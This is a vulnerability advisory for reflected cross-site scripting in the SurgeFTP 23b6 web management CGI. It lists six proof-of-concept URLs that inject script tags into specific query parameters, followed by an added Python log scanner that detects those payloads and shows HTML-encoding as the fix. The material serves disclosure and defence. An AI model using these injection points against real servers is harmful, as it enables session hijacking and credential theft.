Release date:
Updated on:
Affected Systems:
NetWin SurgeFTP 23b6
Description:
--------------------------------------------------------------------------------
Bugtraq id: 49160
SurgeFTP is an FTP server that ships with a web-based management interface.
Multiple cross-site scripting vulnerabilities exist in the implementation of the SurgeFTP web interface: several query parameters of the management CGI are reflected into the response without encoding. A remote attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of a user of the affected site, for example to steal cookie-based authentication credentials.
<* Source: Houssam Sahli *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname="<script>alert('xss');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&last="<script>alert('xss');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&class_name="<script>alert('xss');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=report_file&domainid=0&filter="<script>alert('xss');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=user_admin&domainid="<script>alert('xsss');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid="<script>alert('xss');</script>
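The following is an added example, not part of the advisory or of SurgeFTP itself: it scans web-server access log lines for requests to surgeftpmgr.cgi whose reflected parameters (the ones listed above) carry tag-like markup, and shows the HTML encoding the CGI would need to apply before echoing such a value. The log lines, client addresses and timestamps are constructed.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Query parameters the advisory names as reflected into the page unencoded.
REFLECTED_PARAMS = {"fname", "last", "class_name", "filter", "domainid", "classid"}
# Anything that looks like the start of an HTML tag inside a parameter value.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]", re.IGNORECASE)
# Common Log Format request line: client ... "GET /path?query HTTP/1.1"
CLF_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_request(url: str) -> list:
    """Return the reflected parameter names whose values contain tag-like markup."""
    parts = urlsplit(url)
    if not parts.path.endswith("/cgi/surgeftpmgr.cgi"):
        return []
    hits = []
    # parse_qs percent-decodes values, so %3Cscript%3E is seen as <script>.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in REFLECTED_PARAMS and any(MARKUP_RE.search(v) for v in values):
            hits.append(name.lower())
    return sorted(hits)


def scan_access_log(lines) -> list:
    """Return (client, flagged_params) for each suspicious surgeftpmgr.cgi request."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line)
        if m:
            client, target = m.groups()
            hits = flag_request("http://host" + target)  # scheme/host are placeholders
            if hits:
                findings.append((client, hits))
    return findings


def safe_reflect(value: str) -> str:
    """Server-side fix: HTML-encode a parameter before echoing it into a page."""
    return html.escape(value, quote=True)


# Constructed sample log lines; the payload is the one used in the advisory's PoC.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Aug/2011:10:02:11 +0000] "GET /cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname=%22%3Cscript%3Ealert(%27xss%27)%3B%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Aug/2011:10:03:40 +0000] "GET /cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname=server.log HTTP/1.1" 200 2048',
    '203.0.113.5 - - [15/Aug/2011:10:04:02 +0000] "GET /cgi/surgeftpmgr.cgi?cmd=user_admin&domainid=%22%3Cscript%3Ealert(%27xss%27)%3B%3C/script%3E HTTP/1.1" 200 300',
    '192.0.2.9 - - [15/Aug/2011:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, params in scan_access_log(SAMPLE_LOG):
        print(f"{client}: markup in reflected parameter(s) {params}")
    print(safe_reflect('"<script>alert(\'xss\');</script>'))
```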
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
NetWin
------
Currently, the vendor does not provide a patch or upgrade. Users of the software are advised to watch the vendor's homepage for the latest version:
http://netwinsite.com/